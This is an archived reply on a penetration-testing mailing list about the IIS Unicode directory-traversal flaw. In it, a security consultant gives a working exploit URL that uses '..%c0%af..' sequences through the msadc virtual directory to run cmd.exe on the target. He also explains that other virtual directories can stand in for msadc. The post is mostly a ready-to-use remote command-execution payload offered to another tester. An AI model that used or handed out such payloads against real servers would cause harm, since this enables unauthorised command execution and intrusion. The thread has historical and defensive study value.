Re: [PEN-TEST] Unicode Command Execution

[Roberto Poblete <roberto () ORION CL>]

You may try this:

http://IP_TO_BE
HACKED/msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

where msadc can be any virtual directory with NTFS permision for everyone
and execute permision at the IIS, this means you can replace msadc whit
cgi-bin, certserv, scripts, etc.

good look

Roberto

parth_galen () LYCOS COM escribe:
> The one problem I am having with this exploit is envoking cmd.exe when
> the IIS web root is on a different drive.
>
> If IIS is installed on D:, how do you launch cmd.exe (anything) when it
> is on C: ?
>
> I have been playing the msadc's approach, but not getting it to work...
>
> Any ideas?
>
>
> Get FREE Email/Voicemail with 15MB at Lycos Communications at
> http://comm.lycos.com



_________________________________
Atte,
Roberto Poblete / email: roberto () orion cl
fono: 6403943 / Fax: 6403990
Orion 2000
Servicios Profesionales en Seguridad Informática